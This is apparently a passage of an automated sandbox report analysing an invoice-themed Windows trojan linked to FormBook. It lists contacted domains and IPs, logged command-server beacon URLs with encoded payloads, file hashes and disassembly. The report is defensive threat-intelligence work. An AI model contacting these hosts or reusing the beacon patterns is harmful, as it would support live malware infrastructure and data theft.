                                                                                                                  https://www.west.cn/jiaoyi/fontview.exe, 0000000C.00000002.3736597685.000000000643E000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.000000000438E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://img.sedoparking.com/templates/images/hero_nc.svgfontview.exe, 0000000C.00000002.3736597685.0000000006762000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005AD2000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3738584220.0000000007340000.00000004.00000800.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3736597685.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003A22000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.00000000046B2000.00000004.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003ED8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fontview.exe, 0000000C.00000003.1529295683.0000000007688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.jsfontview.exe, 0000000C.00000002.3736597685.0000000005DF6000.00000004.10000000.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3735725441.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            8.212.101.233
                                                                                                                            		5mm70f.shopSingapore
                                                                                                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                            35.227.246.104
                                                                                                                            		www.xn--4gq62f8w1alm9b.xyzUnited States
                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                            136.243.218.18
                                                                                                                            		www.sorenad.comGermany
                                                                                                                            		24940HETZNER-ASDEfalse
                                                                                                                            84.32.84.32
                                                                                                                            		aifuturesummit.comLithuania
                                                                                                                            		33922NTT-LT-ASLTfalse
                                                                                                                            23.227.38.74
                                                                                                                            		shops.myshopify.comCanada
                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                            103.120.80.111
                                                                                                                            		www.633922.comHong Kong
                                                                                                                            		139021WEST263GO-HKWest263InternationalLimitedHKfalse
                                                                                                                            91.195.240.123
                                                                                                                            		www.bellcom.mediaGermany
                                                                                                                            		47846SEDO-ASDEfalse
                                                                                                                            162.0.222.119
                                                                                                                            		www.spark-tech-global.xyzCanada
                                                                                                                            		35893ACPCAtrue
                                                                                                                            91.195.240.19
                                                                                                                            		parkingpage.namecheap.comGermany
                                                                                                                            		47846SEDO-ASDEfalse
                                                                                                                            199.59.243.225
                                                                                                                            		www.diabloseugene.comUnited States
                                                                                                                            		395082BODIS-NJUSfalse
                                                                                                                            168.76.252.99
                                                                                                                            		www.lxdedu.comSouth Africa
                                                                                                                            		265240ULTRANETSERVICOSEMINTERNETLTDABRfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                            Analysis ID:1340403
                                                                                                                            Start date and time:2023-11-10 09:26:17 +01:00
                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                            Overall analysis duration:0h 11m 27s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:18
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:2
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample file name:Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@9/2@14/11
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 75%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 93%
                                                                                                                            • Number of executed functions: 119
                                                                                                                            • Number of non-executed functions: 279
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • VT rate limit hit for: Invoice_&_SOA_ready_for_dispatch.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            09:27:05API Interceptor1x Sleep call for process: Invoice_&_SOA_ready_for_dispatch.exe modified
                                                                                                                            09:27:53API Interceptor10343519x Sleep call for process: fontview.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            136.243.218.18DHL_Receipt_#9552756186.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.sorenad.com/mfwr/?W01puPf=LTJWGo15CwnFUMIsCmmFPi+fM+G9N87O62/7GHemOkEighpHeH+NhkZmK3bzsqE6vJPkz1dGw+VlCKr/j5+maK11fNnlENBabA==&qd=gjLdkH5hDPjpTT
                                                                                                                            84.32.84.32eKlJmvs8k7.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.educationacielouvert.com/o6g2/?GFQH9=MnxtxZhx94M08V70&oZU=eeE/5eW3ZXGgRwI26chcqn1xSUo8zOrK/YCoGUPYT0IETauoLqCq47+7r9TzfQIn64nM
                                                                                                                            DHL_Receipt_#9552756186.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.aifuturesummit.com/mfwr/?W01puPf=P71ryz7ikMpVgyvm2xSBDscHWVr1mZ45rI7Cv1ELtHby3r+PHAhlEGECiuR4P5ZSl/+0NvxwbB/G92GYswIabv0DmsrGfv05fA==&qd=gjLdkH5hDPjpTT
                                                                                                                            E4Zog9JqbJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.ibrahimmallouhi.info/o6g2/?bl=UV4lEjwhm4ULDTx&Exlpi=Yk1h2iok4dCQgi4P2Azu46lvqwDmTlhJYHf5yEFyxvEzGBAu+uP4sjnUIXImLB1ZPk45
                                                                                                                            015IXAXaPw.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.mithibites.com/ny02/?Kxlh=Ze2y6jnvQl/Sf9dCeO+i89vkLnZWUn/joApwIgSll0Rf6f1L3mQ7oKJVPNVl+xbnBWD6&nd7LlR=V6kp
                                                                                                                            Revised_BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tutorwave.online/udwf/?wfILBX_=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPc3i3LCX8BbVur1Q==&JV5Px=DNL86vYp
                                                                                                                            ai0bE8523b3IsUB.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.carcassfeeders.com/ewae/?C6nxVVFP=oST4u2vZ+SFYLx197X0oL4SH0G+6x7D+fSi+GFamgXNlHGJzIeyc8kVi14XGZvYeajTK9G1C1d0DdH9Ap3zkN9rHssk+Kp8KzQ==&IlP=b8NTi2y0
                                                                                                                            New Order 134390.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.desidigitaldigest.com/do2u/?7PE4D=_RRl3NNhgbY&VhRx6tr=I0v6VTriP0t2tFFob5UYGn17TZanVEB2XC1BxEndpMugkmtwFb5+cTMw2JOk7hWflXQykkKvEhneaXfOkl9VfBTndQORb1Xlkg==
                                                                                                                            Overdue_Payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.ghswanhar.com/u0t4/?Jrdd=cFsDUN&wzall4zp=4EteGVMU5QusLCdzaugNCvwCITabj3ivwQTj1x/Wv0fSPBpLzP4ZjqwCxd5WAfB87rYwoEydCHJiwFyGwE64ptcGIfPfEkP1SQ==
                                                                                                                            Kwserhekrq.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.victorviera.com/ch4g/?8vUdxvwH=xmXyClK07TMD4aus8mYy3h97p16QlDpw1eau3JgxULpKPH5rIS1wD+LjTXGFO3XQbI+BJFNzngwD3Y/OC1PMdMAJck00c5qli0PxbiDeVCvd&Fp=zBzdkNUhdbKPbn
                                                                                                                            AWB_98996910199Clearance_Doc_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.iengineeringmalls.com/b2ep/?o2TX40=9vtKstlxSKfVj3SVuJfleoiXGKg2mrNFFvbEItqascGQuTC5x1fqs/54iH4y8min3KNVAlzX2SLRqXRUY6ReMbLyNKiHpQDWuppfAQKwlVZd&hPE=CBFH1nihR
                                                                                                                            PO_876-1057.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.mindfulpages.online/u6vz/?R8wlm=1TY8Hnd0UPsXMNs&UjPD=/dOOMR+zOAeaHlmZC1hGT7Jed+ZcHoR/n905wDGjq4tEWkOWoJNeTkgKKMwNgApv8NanZj9ZzUhoOz3WaTSepYc/DvdsYozWXw==
                                                                                                                            RFQ2610204.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.bestt-shirt.shop/8hbu/?chU=YRttuRYx&2XBTMN=YplWScn7HDOJkoJ1fZ7qd0wkNHfuisI9CSYVE42jZ1EDar4UxtqY9SeKLzNZHp0ztDGwbxEDIumeLStD/xqmmpoYuoPzDyJ21by6jJcJ0xys
                                                                                                                            RFQ20102024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.bestt-shirt.shop/8hbu/?0N=ERvXLBS&qh=YplWScn7HDOJkoJ1fZ7qd0wkNHfuisI9CSYVE42jZ1EDar4UxtqY9SeKLzNZHp0ztDGwbxEDIumeLStD/xqmlrtZn+DzVyApxg==
                                                                                                                            Purchase_Order_1021234.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.kesatneup1.fun/re5q/?hpZTh=AaaiXAmOJ1YgWlcrvXrYBNNqzZW4rcaWdbTi91TDdaolB9iZeYCXL5kf86lvVUnMgDS/8zDFhkssjwTk58UsactkRv4tweBzsw==&_dspz=cFv8vzExQX
                                                                                                                            Purchase_order.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • www.victorviera.com/ch4g/?UZ=0Dqx4h&dz0dSR=xmXyClK07TMD4aus8mYy3h97p16QlDpw1eau3JgxULpKPH5rIS1wD+LjTXGFO3XQbI+BJFNzngwD3Y/OC1PNDN1aBVEPcJPX0g==
                                                                                                                            hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.ridonestore.shop/coan/?zjV=D+UnKcfj0RBYZLW7mvms/eH5hnRWJCcJV3VuziplscS3jM9Og+RctRmr3V4pTvfRPQ2dOhHIECmunqpOXMFWbcfgm83adco9UMysr93ctXYC&wLC=Y2H4SpI8U2FH447
                                                                                                                            doc_20232407993001901.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.ridonestore.shop/coan/?5Uvj7=oD0-msws&4k75sE=D+UnKcfj0RBYZLW7mvms/eH5hnRWJCcJV3VuziplscS3jM9Og+RctRmr3V4pTvfRPQ2dOhHIECmunqpOXMFWcbOv8e/abINmCg==
                                                                                                                            WoDN7Q47dO.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.educationacielouvert.com/o6g2/?kDKXx0V=eeE/5eW3ZXGgRwI26chcqn1xSUo8zOrK/YCoGUPYT0IETauoLqCq47+7r+rjcVwi+9ed3TZq2g==&DR-DOL=ixopsp0
                                                                                                                            Mzcoqandgnyyyp.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • www.barsandbands.fun/fadc/?0tWh=L6KlLjtl0Ps0bvRVkG+aTTnpOxfwdkju7qZ7NX9I7As+Us0PL6nojt9t0r9jLRvLxHZo&J43P7=2dg8UxPHi4KTr610
                                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.13397.19541.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • www.victorviera.com/8hbu/?QRqdvJ=q52ylF0KP5a0256QpmfyCQnbPX0ERKejRXVTTgPc0lCCpyWBu/AYyYr/03JCkIgp+AvYqA5ISpDSiXnDTze++JF49RqW7vnhlSSNebzi+KvH&Mfxt=Xjktc0pP

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            www.diabloseugene.comRevised_BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 199.59.243.225
                                                                                                                            5mm70f.shopRevised_BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 8.212.102.53
                                                                                                                            www.spark-tech-global.xyzNNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 162.0.222.119
                                                                                                                            Revised_BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 162.0.222.119
                                                                                                                            parkingpage.namecheap.comDcVDfpyF4G.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            61cQ2AJ5tR.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            j7jbTHWTgi.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            Swift#invoice6-15+PO7038.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            INVOICE#20231025.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            Purchase_Order_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            C65v45yjPwh3N8G.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            DHL_Receipt_#9552756186.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            Quotation.xlsGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            file.exeGet hashmaliciousCryptOne, onlyLoggerBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            WFW91621.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            SecuriteInfo.com.Win32.BotX-gen.31536.22198.exeGet hashmaliciousAmadey, CryptOneBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            stvtnhaf3hcj.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            Revised_BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            DHL_On_Demand_Delivery.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            ai0bE8523b3IsUB.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            3swLn9DYp3.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            x8TRXHYzP6.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 91.195.240.19
                                                                                                                            www.sorenad.comDHL_Receipt_#9552756186.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 136.243.218.18
                                                                                                                            www.633922.comRequest_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 103.120.80.111

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCTt4pJQMhy8.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 47.254.80.131
                                                                                                                            FVShYxZJpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 8.220.126.28
                                                                                                                            Revised_BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 8.212.102.53
                                                                                                                            http://telegram88.cc/Get hashmaliciousUnknownBrowse
                                                                                                                            • 8.218.99.161
                                                                                                                            z8kSnLJt9Y.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 47.90.1.107
                                                                                                                            Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 8.212.100.138
                                                                                                                            apavlH3Bzb.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 47.244.18.127
                                                                                                                            pbl0DZaV58.elfGet hashmaliciousOkiruBrowse
                                                                                                                            • 47.242.154.146
                                                                                                                            1u31ptQsf6.elfGet hashmaliciousOkiruBrowse
                                                                                                                            • 8.223.155.226
                                                                                                                            tW89v9x9F4.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 8.223.243.202
                                                                                                                            IGCC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 47.88.189.81
                                                                                                                            eOIFF58KfU.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 8.209.177.134
                                                                                                                            https://alihk.steamproxy.cc/Get hashmaliciousUnknownBrowse
                                                                                                                            • 8.217.145.66
                                                                                                                            MX9Zd8SQhg.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 8.216.92.31
                                                                                                                            7SyP6X5mqJ.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 47.250.151.117
                                                                                                                            https://test-steamproxy.halo-meta.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 47.243.196.181
                                                                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 47.75.94.21
                                                                                                                            ChromeInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 223.5.5.5
                                                                                                                            Purchase_Order_1021234.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 47.57.136.205
                                                                                                                            vDXkQEbxeQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 47.57.136.205
                                                                                                                            HETZNER-ASDEDoctors_Recommendation.scr.exeGet hashmaliciousVidarBrowse
                                                                                                                            • 116.203.166.75
                                                                                                                            3RlxfJ85zX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                            • 95.216.26.247
                                                                                                                            aOJ9YfdhD1.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 176.9.213.136
                                                                                                                            VJWgBdJtv9.exeGet hashmaliciousVidarBrowse
                                                                                                                            • 116.203.166.75
                                                                                                                            9Irkmiibym.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 95.217.66.194
                                                                                                                            DISTINCTIOjv.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 49.13.31.229
                                                                                                                            Go8UUYgt6R.exeGet hashmaliciousVidar, zgRATBrowse
                                                                                                                            • 116.203.165.60
                                                                                                                            CzDgIz6T8n.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Mystic Stealer, RedLine, SmokeLoader, VidarBrowse
                                                                                                                            • 116.203.165.60
                                                                                                                            PDFpower.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 5.161.217.107
                                                                                                                            6TdD4eS6jv.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 95.216.26.247
                                                                                                                            6TdD4eS6jv.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 95.216.26.247
                                                                                                                            PO_44223.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                            • 78.46.83.212
                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                            • 116.203.165.60
                                                                                                                            SXDK.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 49.13.31.229
                                                                                                                            SXDK.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 49.13.31.229
                                                                                                                            6hzcUfGfbw.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            • 128.140.84.205
                                                                                                                            SecuriteInfo.com.Win32.TrojanX-gen.22454.32222.exeGet hashmaliciousVidarBrowse
                                                                                                                            • 116.203.165.60
                                                                                                                            2Xrnlai1A1.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 144.76.136.153
                                                                                                                            2Xrnlai1A1.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 144.76.136.153
                                                                                                                            file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                            • 148.251.234.83

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_&_SOA_ready_for_dispatch.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                            C:\Users\user\AppData\Local\Temp\2N-F32-85

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\fontview.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):196608
                                                                                                                            Entropy (8bit):1.1211596417522893
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.932532622680427
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                            File name:Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            File size:965'632 bytes
                                                                                                                            MD5:eea9bf4a16ab377328a59bde0a0c76df
                                                                                                                            SHA1:d6015abe7bd2ac246af5656410c7f7c7dc5f5637
                                                                                                                            SHA256:fd2ac4af2e4d90f117a8ba49d77cc480f0ad6a8a6cfa7479384d68ce27939f1a
                                                                                                                            SHA512:ca360f0d3572e09ca8f737af9137dd44ae0e1cdba25065876bc20fbd92463f1dd532d30e1c008af56dbc6f664107f688f9397ce4a7a75af3dc3bb5c1728b6ba5
                                                                                                                            SSDEEP:24576:6JOiQEUDJiJMHCxRCilWY+G348OYyVDWLr3IFE:6RaFKdLWYjECH3I
                                                                                                                            TLSH:C82512E5321BA863D5F808FD0511408167F0B0AA3842F3ED6D96B8EE79C7BD24B565CB
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.Me................................. ........@.. ....................... ............@................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x4ed002
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x654DA063 [Fri Nov 10 03:15:47 2023 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
